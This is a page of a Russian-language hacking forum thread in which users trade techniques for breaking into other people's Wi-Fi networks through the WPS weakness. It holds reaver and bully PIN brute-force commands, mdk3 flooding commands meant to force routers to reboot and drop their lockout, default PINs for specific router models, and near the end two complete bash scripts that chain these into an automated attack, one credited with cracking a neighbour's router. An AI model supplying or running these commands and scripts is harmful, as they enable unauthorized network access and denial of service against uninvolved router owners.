PDA

Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup


Страницы : 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 20

asdm
26.08.2014, 23:13
airodump-ng mon0 -c 13 например.



спасибо,вроде пошло....правда с wps проблема осталась,может они еще не перезагрузили или еще что....у меня такое ощущение,что у них не просто интернет тормозит,commview for wifi вообще показывает клиента "неассоциированным",и хендшейков уже кучу наловил...как будто клиент то подключается,то отключается

TOX1C
26.08.2014, 23:46
А кто сказал, что команда должна разблокировать wps? Команда делает что должна - дрючит роутер. То, что он не хочет перезагружаться - уже другой вопрос.

asdm
27.08.2014, 00:01
А кто сказал, что команда должна разблокировать wps? Команда делает что должна - дрючит роутер. То, что он не хочет перезагружаться - уже другой вопрос.



да я в курсе...просто написал,что не все еще додумаются перезагрузить роутер

СЕРЖ32
27.08.2014, 00:42
А кто сказал, что команда должна разблокировать wps? Команда делает что должна - дрючит роутер. То, что он не хочет перезагружаться - уже другой вопрос.



ну так срочно нужна команда,которая разблокирует wps

aladin1
27.08.2014, 00:47
я все же победил этот Upvel! вообщем mdk3 все таки действует, удалось отправить точку в ребут, после чего спокойно подключился по пину. зашел в роутер а там Продолжительность работы: 0day:1h:7m:18s значит сработало от UR-315BN пин был действительно 99956042.

и вот еще, подскажите какие могут быть пины, если не сложно:

EC:43:F6:04:C9:5C - кинетик

F4C:F9:98:490 - хуавей

спасибо.

asdm
27.08.2014, 00:52
вообщем mdk3 все таки действует, удалось отправить точку в ребут



с помощью mdk3 mon0 a -a mac?

Vikhedgehog
27.08.2014, 01:08
я все же победил этот Upvel! вообщем mdk3 все таки действует, удалось отправить точку в ребут, после чего спокойно подключился по пину. зашел в роутер а там Продолжительность работы: 0day:1h:7m:18s значит сработало от UR-315BN пин был действительно 99956042.

и вот еще, подскажите какие могут быть пины, если не сложно:

EC:43:F6:04:C9:5C - кинетик

F4C:F9:98:490 - хуавей

спасибо.



Кинетик - 0313692

aladin1
27.08.2014, 01:14
с помощью mdk3 mon0 a -a mac?



да, но я с трех устройств долбил её сразу(два тп-линка 7200 + встроенный в ноут адаптер) где то часа на два оставил, в итоге всё стало нормально.

Vikhedgehog
27.08.2014, 01:16
да, но я с трех устройств долбил её сразу(два тп-линка 7200 + встроенный в ноут адаптер) где то часа на два оставил, в итоге всё стало нормально.



Это наверное хозяин точки перезагрузил ее.

СЕРЖ32
27.08.2014, 01:18
я все же победил этот Upvel! вообщем mdk3 все таки действует, удалось отправить точку в ребут, после чего спокойно подключился по пину. зашел в роутер а там Продолжительность работы: 0day:1h:7m:18s значит сработало от UR-315BN пин был действительно 99956042.

и вот еще, подскажите какие могут быть пины, если не сложно:

EC:43:F6:04:C9:5C - кинетик

F4C:F9:98:490 - хуавей

спасибо.



и какой всё таки командой победил?и как увидел,что точка ушла в ребут,ты что,всё время в монитор смотрел?

aladin1
27.08.2014, 01:25
Кинетик - 0313692



хм, что то не подходит, да и ладно, все равно сигнал до точки хреновый, поюзать не выйдет



Это наверное хозяин точки перезагрузил ее.



да, именно так мне и надо было, бедный хозяин



и какой всё таки командой победил?и как увидел,что точка ушла в ребут,ты что,всё время в монитор смотрел?


mdk3 mon0 a -a MAC

а никак, поставил флудить ее и отошел, пришел и все готово, wps разлочено, подключился, когда зашел в роутер то увидел что он работает всего час.

asdm
27.08.2014, 14:02
спасибо,вроде пошло....правда с wps проблема осталась,может они еще не перезагрузили или еще что....у меня такое ощущение,что у них не просто интернет тормозит,commview for wifi вообще показывает клиента "неассоциированным",и хендшейков уже кучу наловил...как будто клиент то подключается,то отключается



короче,они перезагрузили...подбор пина продолжился и на 90.90% началась долбежка одного и того же пина (99985677)....никаких -s и т.п. не использовал

СЕРЖ32
27.08.2014, 14:26
кто в курсе,как можно пробраться в точку по портам?ну вот по telnet например?чужая точка понятное дело

Vikhedgehog
27.08.2014, 15:47
короче,они перезагрузили...подбор пина продолжился и на 90.90% началась долбежка одного и того же пина (99985677)....никаких -s и т.п. не использовал



А -N или -L?

asdm
27.08.2014, 16:10
А -N или -L?



вообще ничего,подбирал в airslaxе...ручками я команды не писал,но airlslax вроде ничего лишнего не вставляет

SlNik
27.08.2014, 18:48
короче,они перезагрузили...подбор пина продолжился и на 90.90% началась долбежка одного и того же пина (99985677)....никаких -s и т.п. не использовал



Такое случается при использовании ривера 1.4. Меня в таком случае два раза выручал ривер 1.3. Или бали, но она не все точки подхватывает. Алгоритм перебора пина в версии 1.3 другой. Но это означает запуск с начала. А если точка еще и лочится...

asdm
27.08.2014, 19:03
Меня в таком случае два раза выручал ривер 1.3.



а где взять reaver 1.3?



Или бали



bully?

4pips
27.08.2014, 20:54
а где взять reaver 1.3?

bully?



Если точка Trendnet, то лучше использовать bully, если другая, то пробовать reaver 1.3. Обе утилиты есть в wifislax начиная с версии 4.6 (сейчас актуальная 4.9).

VladimirV
27.08.2014, 22:45
1) Точка TP-Link (10:FE:ED:5A:XX:XX) после применения mdk3 уходит на другой канал (WPS не сбрасывается). Чем отследить смену канала и переключить monitor на новый канал?

2) Есть точка с BSSID 1C:7E:E5:2F:XX:XX какой пин не поставлю на перебор в reaver выдает 90%. В моих базах есть только 1C:7E:E5:XX:XX:XX - это ADSL. Если есть у кого пины 1C:7E:E5:2F:XX:XX киньте в пожалуйста ЛС.

asdm
28.08.2014, 02:12
Алгоритм перебора пина в версии 1.3 другой.



в разнобой пины перебирает,копия bully



Обе утилиты есть в wifislax начиная с версии 4.6 (сейчас актуальная 4.9).



так как точка лочится приходится после 10 пинов ждать некоторое время,пока она разлочится

reaver 1.4-240 сек.

bully-215 сек.

reaver 1.3-1575 сек. (5 раз по 315 сек.) и до сих пор он чего то ждет,то есть время может возрасти

точка лочится как минимум на 215 секунд после чего спокойно перебирает следующие 10 пинов,тогда зачем он столько выжидает? можно ли как-то сократить это время вручную?

я сейчас принудительно остановил подбор,а потом заново начал и снова он начал перебирать,то есть проблема точно в reaver 1.3,а не в точке

Vikhedgehog
28.08.2014, 02:14
1) Точка TP-Link (10:FE:ED:5A:XX:XX) после применения mdk3 уходит на другой канал (WPS не сбрасывается). Чем отследить смену канала и переключить monitor на новый канал?

2) Есть точка с BSSID 1C:7E:E5:2F:XX:XX какой пин не поставлю на перебор в reaver выдает 90%. В моих базах есть только 1C:7E:E5:XX:XX:XX - это ADSL. Если есть у кого пины 1C:7E:E5:2F:XX:XX киньте в пожалуйста ЛС.



1. Если ты ривером пытаешься взломать точку, исключи опцию -c, и добавь -L, тогда ривер будет самостоятельно искать точку на всех каналах при потери связи с ней.

2. Это ж d-link. Для ADSL модемов: 46264848, 31957199, 7622909... Если DIR - то алгоритм неизвестен... но особой проблемы не вижу тк у них нет лока. Если хочешь, могу попробовать че нидь с router scan поискать.

aladin1
28.08.2014, 02:23
2) Есть точка с BSSID 1C:7E:E5:2F:XX:XX какой пин не поставлю на перебор в reaver выдает 90%. В моих базах есть только 1C:7E:E5:XX:XX:XX - это ADSL. Если есть у кого пины 1C:7E:E5:2F:XX:XX киньте в пожалуйста ЛС.



у меня была такая точка, пин был 65126141 пробуй

СЕРЖ32
28.08.2014, 11:50
в разнобой пины перебирает,копия bully

так как точка лочится приходится после 10 пинов ждать некоторое время,пока она разлочится

reaver 1.4-240 сек.

bully-215 сек.

reaver 1.3-1575 сек. (5 раз по 315 сек.) и до сих пор он чего то ждет,то есть время может возрасти

точка лочится как минимум на 215 секунд после чего спокойно перебирает следующие 10 пинов,тогда зачем он столько выжидает? можно ли как-то сократить это время вручную?

я сейчас принудительно остановил подбор,а потом заново начал и снова он начал перебирать,то есть проблема точно в reaver 1.3,а не в точке



у разных точек,разное время лока,вот у меня в эфире точек 15,у которых лок пол года уже ,т.е у каждой точки разное время лока,у одной на 5 мин лок может быть,у другой час,у третий день,сутки,пару дней,неделя,до перезагрузки,и тд.Так что если у точки на длительное время лок,то это геммор,годами перебирать можно

СЕРЖ32
28.08.2014, 11:52
1. Если ты ривером пытаешься взломать точку, исключи опцию -c, и добавь -L, тогда ривер будет самостоятельно искать точку на всех каналах при потери связи с ней.

2. Это ж d-link. Для ADSL модемов: 46264848, 31957199, 7622909... Если DIR - то алгоритм неизвестен... но особой проблемы не вижу тк у них нет лока. Если хочешь, могу попробовать че нидь с router scan поискать.



что значит у длинка нет лока всё есть,свежую прошивочку поставить и вуаля,лок такой же как и у тплинков ,та хоть dir-300 с новой прошивкой будет лочиться

asdm
28.08.2014, 11:57
у разных точек,разное время лока,вот у меня в эфире точек 15,у которых лок пол года уже ,т.е у каждой точки разное время лока,у одной на 5 мин лок может быть,у другой час,у третий день,сутки,пару дней,неделя,до перезагрузки,и тд.Так что если у точки на длительное время лок,то это геммор,годами перебирать можно


блин,ты вообще читаешь,что в моем сообщении написано? или реагуруешь на слово "лочится"?

СЕРЖ32
28.08.2014, 11:58
кстати,вы следили за тем,как mdk3 работает,что пишет?у меня как то странно вешает клиентов.т.е вешает одного и того же клиента,т.е один мак адрес,пишет,клиент с таким то мак адресом приконнектился к точке,например уже миллион клиентов подцепилось,только не клиентов а клиента.т.е один мак адрес вешается....по моему разные мак адреса должны на точку вешаться У кого как?

СЕРЖ32
28.08.2014, 12:00
блин,ты вообще читаешь,что в моем сообщении написано? или реагуруешь на слово "лочится"?



конечно читаю

а вообще тебе везёт,что точка перебирает после такой короткой паузы,у меня точки такие,что через пару часов лок снимается,через день,или вообще вон.пол года в локе точки

Vikhedgehog
28.08.2014, 13:01
что значит у длинка нет лока всё есть,свежую прошивочку поставить и вуаля,лок такой же как и у тплинков ,та хоть dir-300 с новой прошивкой будет лочиться


На FTP D-Linkа последнее обновление для DIR-300, DIR-320 A1 - 2010 год, тогда еще ривера не было У DIR-300 B1, B2, B3 - 2012, там в информации об обновлении ни слова про WPS. B5, B6, B7 - наверное защита там есть, но никогда не видел чтоб DIR-300 лочился. Раньше было много 802.11g точек без WPS, но это мне кажется люди самостоятельно выключали. Однажды видел DIR-615, который лочился, но точка была открытой, и помоему мне удалось избежать лока при помощи замедления ривера (ривер пробует скажем 9/10 пинов а потом добровольно останавливается на 60 сек и лока не происходит, обычно точка забывает про 9 неудачных попыток намного быстрее, чем разлочивается). У буржуев DIR-300 тоже не лочатся, но они их больше не продают. Зато DIR-655, DIR-860L и прочее - лочатся, причем очень агрессивно.

СЕРЖ32
28.08.2014, 13:26
На FTP D-Linkа последнее обновление для DIR-300, DIR-320 A1 - 2010 год, тогда еще ривера не было У DIR-300 B1, B2, B3 - 2012, там в информации об обновлении ни слова про WPS. B5, B6, B7 - наверное защита там есть, но никогда не видел чтоб DIR-300 лочился. Раньше было много 802.11g точек без WPS, но это мне кажется люди самостоятельно выключали. Однажды видел DIR-615, который лочился, но точка была открытой, и помоему мне удалось избежать лока при помощи замедления ривера (ривер пробует скажем 9/10 пинов а потом добровольно останавливается на 60 сек и лока не происходит, обычно точка забывает про 9 неудачных попыток намного быстрее, чем разлочивается). У буржуев DIR-300 тоже не лочатся, но они их больше не продают. Зато DIR-655, DIR-860L и прочее - лочатся, причем очень агрессивно.



ну незнаю....у меня и длинки лочились,просто тплинки,асусы,вообще лочатся или надолго или до перезагрузки,или ресета.А замедление работы ривера на время,это фигня,если в лок уходит после 10 переборов,так что в этом случае таймер для перебора до п....ды

TOX1C
28.08.2014, 15:29
У меня лочились наглухо только тп линки те что с гигабитными портами и новые асусы с черно-синей прошивкой. Длинки лочились на пару минут или вообще не лочились, дешевые тп линки лочились надолго, старые асусы после 3 попыток лочились на минуту. G точки с толковым впс ещё не встречал, ну один тп линк был (wl340g помоему), так тот на пине 1234567 сдался длинк дсл так все с одним пином шли)))

тп линки довольно говнистые аппараты, у них пин прописан во флешке вместе с маком. Алгоритм расчетов неизвестен.

СЕРЖ32
28.08.2014, 15:47
У меня лочились наглухо только тп линки те что с гигабитными портами и новые асусы с черно-синей прошивкой. Длинки лочились на пару минут или вообще не лочились, дешевые тп линки лочились надолго, старые асусы после 3 попыток лочились на минуту. G точки с толковым впс ещё не встречал, ну один тп линк был (wl340g помоему), так тот на пине 1234567 сдался длинк дсл так все с одним пином шли)))

тп линки довольно говнистые аппараты, у них пин прописан во флешке вместе с маком. Алгоритм расчетов неизвестен.



вот то ж....тплинки лочатся надолго,как и асусы,или даже навсегда,до ресета...

Я вот думаю.как можно на точку по wifi зайти через telnet,ssh....было б супер так в веб морду заходить,самый быстрый взлом бы был

J()KER
28.08.2014, 15:51
кстати,вы следили за тем,как mdk3 работает,что пишет?у меня как то странно вешает клиентов.т.е вешает одного и того же клиента,т.е один мак адрес,пишет,клиент с таким то мак адресом приконнектился к точке,например уже миллион клиентов подцепилось,только не клиентов а клиента.т.е один мак адрес вешается....по моему разные мак адреса должны на точку вешаться У кого как?



поделюсь с тобой волшебной командой mdk3 --help

J()KER
28.08.2014, 16:04
у меня очень много появилось точек Totolink с bssid 78:44:76:XX:XX:XX , пин от которых - 99956042 , которые уходят в лок после попытки ввести верный пин ривером на пару дней ( а может до перезагрузки), победил с помощью bully (может ривер тоже может, но я на него забил)

bully mon0 -e -b -c -p 99956042 -B -W -D

TOX1C
28.08.2014, 16:10
99956042 это помоему от роутеров upvel, что онлайм выдает.

henri2002
28.08.2014, 16:29
99956042 это помоему от роутеров upvel, что онлайм выдает.




они и есть Totolink

СЕРЖ32
28.08.2014, 16:56
у меня очень много появилось точек Totolink с bssid 78:44:76:XX:XX:XX , пин от которых - 99956042 , которые уходят в лок после попытки ввести верный пин ривером на пару дней ( а может до перезагрузки), победил с помощью bully (может ривер тоже может, но я на него забил)

bully mon0 -e <ESSID> -b <BSSID> -c <CHANNEL> -p 99956042 -B -W -D


та....то ты пин уже знаешь а если с начали пины перебирать,уйдёт в лок и никакой булли не поможет Нужна реально команда,которая сбрасывает лок

TOX1C
28.08.2014, 17:03
Вряд ли такая команда вообще есть. Может только эксплойтом каким то точку ужалить.

СЕРЖ32
28.08.2014, 17:07
Вряд ли такая команда вообще есть. Может только эксплойтом каким то точку ужалить.



ну вот....а говоришь нет какая разница.как это называтся будет,команда или что либо

А пробовал на точки заходить по telnet,ssh?можно то как то через это в точку зайти....

Vikhedgehog
28.08.2014, 18:03
А пробовал на точки заходить по telnet,ssh?можно то как то через это в точку зайти....



Через telnet/SSH это как? Через инет имеешь в виду? Можно. если открыты соответствующие порты, что маловероятно.

СЕРЖ32
28.08.2014, 18:10
Через telnet/SSH это как? Через инет имеешь в виду? Можно. если открыты соответствующие порты, что маловероятно.



нет,именно имею в виду telnet,порт 23,и ssh ,порт 22.Ну так у многих эти порты открыты,вот в чём прикол Просто научиться заходить по этим портам,ну и для этого нужно ж как то просканить чужой роутер на предмет открытых этих портов,та и вообще любых портов,а вот как?

J()KER
28.08.2014, 18:12
нет,именно имею в виду telnet,порт 23,и ssh ,порт 22.Ну так у многих эти порты открыты,вот в чём прикол Просто научиться заходить по этим портам,ну и для этого нужно ж как то просканить чужой роутер на предмет открытых этих портов,та и вообще любых портов,а вот как?


не зная пароль от wifi сети можно просканить толко если знаешь ip точки, сканить можно через nmap

СЕРЖ32
28.08.2014, 18:16
не зная пароль от wifi сети можно просканить толко если знаешь ip точки, сканить можно через nmap



какой именно ip?внешний?так если я знаю внешний ip,я просканю роутер сканом и узнаю всё ,а внутренний ip ж обычный,192.168.0.1 или 192.168.1.1 но ничиго ж не сканится так,то только если подключён к точке,а если нет

TOX1C
28.08.2014, 19:48
Я так понял, что с интернета хочется пролезть во внутреннюю сеть роутера и оттуда сканить? Или как?

J()KER
28.08.2014, 19:52
Я так понял, что с интернета хочется пролезть во внутреннюю сеть роутера и оттуда сканить? Или как?



он хочет кнопку "Сделать хорошо" - нажимаешь, опа, и сеть взломана.

СЕРЖ32
29.08.2014, 17:18
скажите,как правильно работает mdk3,т.е что показывать должно? я если выбираю:mdk3 mon0 a -a mac,то показывает,что вешаются клиенты,но почему то один и тот же мак адрес клиента вещается....разве это правильно?Да,показывает,чт столько то клиентов подцепилось,миллион например,но один и тот же мак адрес,т.е это как,один клиент всего миллион раз подконнектился?

comporg
29.08.2014, 17:39
скажите,как правильно работает mdk3,т.е что показывать должно? я если выбираю:mdk3 mon0 a -a mac,то показывает,что вешаются клиенты,но почему то один и тот же мак адрес клиента вещается....разве это правильно?Да,показывает,чт столько то клиентов подцепилось,миллион например,но один и тот же мак адрес,т.е это как,один клиент всего миллион раз подконнектился?


В BackTrack5 R3 разные маки вешаются...

СЕРЖ32
29.08.2014, 17:51
В BackTrack5 R3 разные маки вешаются...



у меня wifi slax,как то он мне больше нравится

Я имею ввиду,если вешается один и тот же мак,но много,тысячами,эффект тот же что и в BackTrack5 R3,где разные маки вещаются?

J()KER
30.08.2014, 00:38
у меня wifi slax,как то он мне больше нравится

Я имею ввиду,если вешается один и тот же мак,но много,тысячами,эффект тот же что и в BackTrack5 R3,где разные маки вещаются?



господи, неужели так сложно ман почитать, или задалбывать всех глупыми вопросами это дело принципа?

Параметр -m заставляет mdk3 вешать разные маки на точку.

asdm
30.08.2014, 22:02
кто-нибудь знает,как решить эту проблему?

http://forum.antichat.ru/showpost.php?p=3759554&postcount=2042

J()KER
30.08.2014, 22:26
Не ну блин, вы хелп читаете или наугад по кнопкам долбите?



reaver -h

Reaver v1.4 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

Required Arguments:

-i, --interface=<wlan> Name of the monitor-mode interface to use

-b, --bssid=<mac> BSSID of the target AP

Optional Arguments:

-m, --mac=<mac> MAC of the host system

-e, --essid=<ssid> ESSID of the target AP

-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)

-o, --out-file=<file> Send output to a log file [stdout]

-s, --session=<file> Restore a previous session file

-C, --exec=<command> Execute the supplied command upon successful pin recovery

-D, --daemonize Daemonize reaver

-a, --auto Auto detect the best advanced options for the target AP

-f, --fixed Disable channel hopping

-5, --5ghz Use 5GHz 802.11 channels

-v, --verbose Display non-critical warnings (-vv for more)

-q, --quiet Only display critical messages

-h, --help Show help

Advanced Options:

-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin

-d, --delay=<seconds> Set the delay between pin attempts [1]

-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]

-g, --max-attempts=<num> Quit after num pin attempts

-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]

-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts

-t, --timeout=<seconds> Set the receive timeout period [5]

-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]

-A, --no-associate Do not associate with the AP (association must be done by another application)

-N, --no-nacks Do not send NACK messages when out of order packets are received

-S, --dh-small Use small DH keys to improve crack speed

-L, --ignore-locks Ignore locked state reported by the target AP

-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet

-n, --nack Target AP always sends a NACK [Auto]

-w, --win7 Mimic a Windows 7 registrar [False]

Example:

reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv



в твоем случае тебе нужно добавить параметр -r 9:120 - ривер каждые 9 пинов будет делать паузу в 2 минуты, по идее точка быстрее забывает про предыдущие неудачные попытки чем разлачивается. Время, которое ривер будет ждать подбирай опытным путем, можешь сократить, а может прийдется и увеличить.

asdm
31.08.2014, 00:57
Не ну блин, вы хелп читаете или наугад по кнопкам долбите?

в твоем случае тебе нужно добавить параметр -r 9:120 - ривер каждые 9 пинов будет делать паузу в 2 минуты, по идее точка быстрее забывает про предыдущие неудачные попытки чем разлачивается. Время, которое ривер будет ждать подбирай опытным путем, можешь сократить, а может прийдется и увеличить.



я знаю.что точка разлачивается как минимум через 215 секунд,а reaver 1.3 (именно эта версия,с 1.4 и bully все нормально,но там другие проблемы...) продолжает ждать даже по прошествию этих 215 секунд,я уже задавал с помощью ключа -l продолжительность паузы,но следующие 10 пинов он не хочет перебирать,так как считает,что точка все еще залочена,а на самом деле уже все нормально,ведь если остановить подбор и начать заново начинается подбор следующих 10 пинов

SlNik
31.08.2014, 01:41
я знаю.что точка разлачивается как минимум через 215 секунд,а reaver 1.3 (именно эта версия,с 1.4 и bully все нормально,но там другие проблемы...) продолжает ждать даже по прошествию этих 215 секунд,я уже задавал с помощью ключа -l продолжительность паузы,но следующие 10 пинов он не хочет перебирать,так как считает,что точка все еще залочена,а на самом деле уже все нормально,ведь если остановить подбор и начать заново начинается подбор следующих 10 пинов



Ну добавь к этому ещё -L . Будет игнорировать лок и долбить дальше.

СЕРЖ32
31.08.2014, 15:48
Ну добавь к этому ещё -L . Будет игнорировать лок и долбить дальше.



игнорирует буквально пару пинов,т.е пару пинов перебирает и всё Так что эта команда до одного места так что если точка залочилась,то всё

СЕРЖ32
31.08.2014, 15:59
кстати,попробовал я mdk3 запустить на точку и в то же время ривер работал,когда лок wps....Что могу сказать,фигня это всё.....да,вроде точка или перезагружалась или хозяин перезагружал,или канал сама точка меняет,незнаю,но да,перебор опять пошёл,но пару пинов и опять лок Так если бы точка перезагружалась хоть раз в минуту,было бы супер,а так....долго долбить нужно,миллионы клиентов цеплять нужно,э это время.Вот на ночь так оставил,утром всего 8 пинов Так что фигня этот способ,если лочится,так годами перебирать .

Вот у кого как,когда вы запускаете на точку mdk3?как быстро точка перезагружается,сколько пинов добываете в день?

кстати,при mdk3 адаптер долго не работает,у меня альфа оригинальная,и всё равно через мин 15 адаптер или сам отключается или ещё что то,короче ничего не делает,приходится вытаскивать с usb,опять подключать,и тд....короче все операции производить заново,видимо mdk3 грузит очень адаптер....

aladin1
31.08.2014, 18:13
кстати,попробовал я mdk3 запустить на точку и в то же время ривер работал,когда лок wps....Что могу сказать,фигня это всё.....да,вроде точка или перезагружалась или хозяин перезагружал,или канал сама точка меняет,незнаю,но да,перебор опять пошёл,но пару пинов и опять лок Так если бы точка перезагружалась хоть раз в минуту,было бы супер,а так....долго долбить нужно,миллионы клиентов цеплять нужно,э это время.Вот на ночь так оставил,утром всего 8 пинов Так что фигня этот способ,если лочится,так годами перебирать .

Вот у кого как,когда вы запускаете на точку mdk3?как быстро точка перезагружается,сколько пинов добываете в день?

кстати,при mdk3 адаптер долго не работает,у меня альфа оригинальная,и всё равно через мин 15 адаптер или сам отключается или ещё что то,короче ничего не делает,приходится вытаскивать с usb,опять подключать,и тд....короче все операции производить заново,видимо mdk3 грузит очень адаптер....



да пойми же ты, что это зависит сугубо от хозяина, когда он будет ребутить роутер и вообще будет ли. я в одном случае ждал 10 минут, во втором 3 часа. сам mdk3 не ребутит точку, он лишь просит хозяина сделать это

а насчет альфы, это распиаренный хомяками шлак, покупал я такую, и кучу гемороя хапнул с ней, зато когда перешел на тп-линк 7200 то забыл о всех проблемах. альфа тупо не умеет работать стабильно, даже при полном сигнале до точки будет отваливаться постоянно, а если еще и стена бетонная между тобой и точкой, то вообще печаль, купи нормальный адаптер и не парься. лично у меня mdk3 спокойно более 3 часов хреначил в три(!) копии одновременно(больше просто не пробовал, но уверен что сможет на много дольше)

asdm
31.08.2014, 18:32
Ну добавь к этому ещё -L . Будет игнорировать лок и долбить дальше.



reaver 1.3 mon0 -b mac -l 215 -L так?

comporg
31.08.2014, 18:51
reaver 1.3 mon0 -b mac -l 215 -L так?



reaver -i mon0 -d 0 -b XX:XX:XX:XX:XX:XX -a -vv -S -n -N -r 9:220 -L -c #

# - номер канала жертвы

СЕРЖ32
31.08.2014, 19:02
да пойми же ты, что это зависит сугубо от хозяина, когда он будет ребутить роутер и вообще будет ли. я в одном случае ждал 10 минут, во втором 3 часа. сам mdk3 не ребутит точку, он лишь просит хозяина сделать это

а насчет альфы, это распиаренный хомяками шлак, покупал я такую, и кучу гемороя хапнул с ней, зато когда перешел на тп-линк 7200 то забыл о всех проблемах. альфа тупо не умеет работать стабильно, даже при полном сигнале до точки будет отваливаться постоянно, а если еще и стена бетонная между тобой и точкой, то вообще печаль, купи нормальный адаптер и не парься. лично у меня mdk3 спокойно более 3 часов хреначил в три(!) копии одновременно(больше просто не пробовал, но уверен что сможет на много дольше)



так у меня 2 альфы,одна из которых на том же чипе что и на тп-линк 7200 ,так что покупать не надо

Странно.тут писали,что mdk3 может вынудить точку самой перезагрузиться,например когда клиентов на неё навешиваешь

а вообще,это всё равно если и будет получаться,то годы уйдут на это,точка ж не каждую минуту перезагружается

А вот на практике,какая команда лучшая в mdk3?мне понравилась та,которая не даёт подключаться с шифрованием wpa/wpa2,но всё равно никто на wep не переходит

Ну и,за какое время так точка задавалась?сколько пинов в день отдавала?

СЕРЖ32
31.08.2014, 19:05
reaver -i mon0 -d 0 -b XX:XX:XX:XX:XX:XX -a -vv -S -n -N -r 9:220 -L -c #

# - номер канала жертвы



а канал точка менять может может лучше без канала?я вообще нигде канал не ставлю,что бы автоматом находил,а то точки меняют каналы

VladimirV
01.09.2014, 00:10
Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.

Вот его код:


#!/bin/sh
while true;
# Run reaver to work 50s
do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
sleep 4;
# Run mdk3 to work 10s
echo [+] Mdk3 is working ...
timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
sleep 24;
done;

У меня он не заработал и я его переделал:


#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ...
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;

# Run mdk3 to work 3s
echo
echo
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;

и меньше чем за сутки взломал эту сеть!

sleep 3 - это сколько секунд шарашит mdk3

sleep 14 - пауза до появления точки в эфире

-g 10 - сколько пинов перебирать

Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.

Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.

https://forum.antichat.ru/threads/310835/page-193#post-4037706

СЕРЖ32
01.09.2014, 00:20
Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.

Вот его код:


#!/bin/sh
while true;
# Run reaver to work 50s
do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
sleep 4;
# Run mdk3 to work 10s
echo [+] Mdk3 is working ...
timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
sleep 24;
done;

У меня он не заработал и я его переделал:


#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ...
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;

# Run mdk3 to work 3s
echo
echo
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;

и меньше чем за сутки взломал эту сеть!

sleep 3 - это сколько секунд шарашит mdk3

sleep 14 - пауза до появления точки в эфире

-g 10 - сколько пинов перебирать

Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.

Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.



что то слишком красиво и легко ,у меня этот mdk3 никаких проблем никакой точке не доставляет

Это конкретно к тплинкам?а как скрипт на другие точки действует,типа асусов,пробовал?

Прям так точка и здавалась легко на mdk3?значит точка такая,повезло а функция конкретно в скрипте mdk3 какая,навешивание ложных клиентов или деаут клиентов,или какая другая функция?

VladimirV
01.09.2014, 00:27
что то слишком красиво и легко ,у меня этот mdk3 никаких проблем никакой точке не доставляет

Это конкретно к тплинкам?а как скрипт на другие точки действует,типа асусов,пробовал?



Проверял на точках которые мне доступны - кроме TP-Link ни одна не повелась. И из TP-Link ведется %25-30. Но Это лучше чем ничего!!!

СЕРЖ32
01.09.2014, 00:43
Проверял на точках которые мне доступны - кроме TP-Link ни одна не повелась. И из TP-Link ведется %25-30. Но Это лучше чем ничего!!!



а не мало ли mdk3 работает?3 сек всего что это за точки,которые от 3 сек падать будут ,я вон миллионы клиентов цеплял,точкам пофиг,тоже тп линк

Говорю ж....красиво всё как то ну или там у тебя такие точки попадаются слабые

TOX1C
01.09.2014, 00:59
Все работает как надо, тп линк 740 от скрипта сдулся. Более мощные точки, типа 1043 на левых клиентов ложили свои большие черные.... антенны

СЕРЖ32
01.09.2014, 01:05
Все работает как надо, тп линк 740 от скрипта сдулся. Более мощные точки, типа 1043 на левых клиентов ложили свои большие черные.... антенны


вот и я ж говорю то какие точки просто,видимо слабые сдуваются только,а мощным,хоть миллиард клиентов вешай

Я ж прочитал скрипт и удивился,что mdk3 3 сек только работает,сколько он клиентов на точку повесит ,mdk3 нужно на пол часа оставлять,может и будет эффект

СЕРЖ32
